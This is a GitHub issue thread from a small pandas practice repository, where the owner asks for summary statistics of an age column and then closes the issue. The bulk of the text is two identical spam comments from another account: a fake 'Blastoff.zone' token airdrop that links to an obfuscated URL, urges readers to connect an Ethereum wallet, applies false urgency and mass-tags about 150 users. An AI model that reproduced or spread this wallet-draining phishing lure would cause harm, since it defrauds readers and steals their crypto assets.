### ISSUE TITLE
Display stats

### ISSUE THREAD

**Issue by rajupenumatsa** [rajupenumatsa/pandas-practice#1]
Display stats like min, max, mean and standard deviation of age column

**Comment by rajupenumatsa** [comment]
Fixed this as #87317db8f15122776ae46356d29c9eb96b8c384d

**Comment by rajupenumatsa** [comment]
Fixed this and closing it

**Comment by kobirbd18** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
dung1t, @Blaine-Mason, @joestanl3y, @loopiezlol, @amarnp85, @yingnengd, @jinczing, @RevoStaffone, @calvinturner, @timouwerkerk, @jonabe, @wayhome, @Prat617, @Quantbrinx, @seguidor777, @baryshev, @lguoca, @dm267, @ChocoShell, @crazypythonista, @hn2, @nova-land, @ben-jit, @bprabhuin, @thysruben, @MihirVangani17, @billtron, @ProfitPhenom, @royburns, @dabao1257, @Resmung0, @skssu, @maxclchen, @rseverinop, @loki-zhou, @secp600k1, @kaczy44, @nigerninja, @oyesindhi, @tiwilliam, @oakejp12, @jordankiggundu, @SergKlein, @kdkiss, @realwaynesun, @i-aztec, @athon-millane, @bz77, @realm520, @danteGPTdmarienko, @SamAbdelbadie, @lovepocky, @Jbond007-11, @tngdr, @GwakJunwoo, @Adeel-Intizar, @dimx9173, @yongdono, @ramishni, @hanbinggan, @Marco-Christiani, @RGDub, @daviddwlee84, @skzv, @hungha11, @Chris6622, @doomedkiddo, @brandonyano, @dhiruyaga, @nitinongit, @zerak, @benstear, @mayank160920, @sopay, @vorotynsky, @sseveran, @vipinbhagat123, @bprabhuin, @zhuoqiang, @Armstrm6, @aaiken1, @den4ess, @mohadmohammadi, @ForrestDevs, @nikhilranjan7, @eLoyyyyy, @yasdelayu, @benedoug, @cpowlett, @pra1had, @Vandr10, @MilleniumSpark, @gangodu, @LechedeRoma, @DJinnzNathan, @ducga1998, @thisismeleaving, @ddanielmmonteiro, @unijoyvitlyent099, @sultank1, @zhangheli, @shiniantianlang, @tjreese90, @Brambram, @spytensor, @willv, @pavlosidelov, @louis-xuy, @krzysztof-jusiak, @gustavosmede, @Sowen777, @alphafund, @alexcwyu, @notabombe, @praveen686, @010011x, @alex-muci, @natwijaya19, @f0cii, @DOUGLASMENDES, @hunej, @maumenegaz, @xPoppa-zz, @paulphys, @uuuzz, @matuskonecny, @ZwEin27, @gustafbjorn, @nox120, @sachinjncie, @NEITRAL05, @lkgrgwu, @kogriv, @St3phZhang, @lucket, @TedSIWEILIU, @h1u2i3, @ViniAbreu, @stucash, @florian-kalisch, @jarihte, @vedantk281007, @minhlucvan, @whizzbee, @Antony-Jia, @jytan023, @alwang35, @qwpto

**Comment by kobirbd18** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
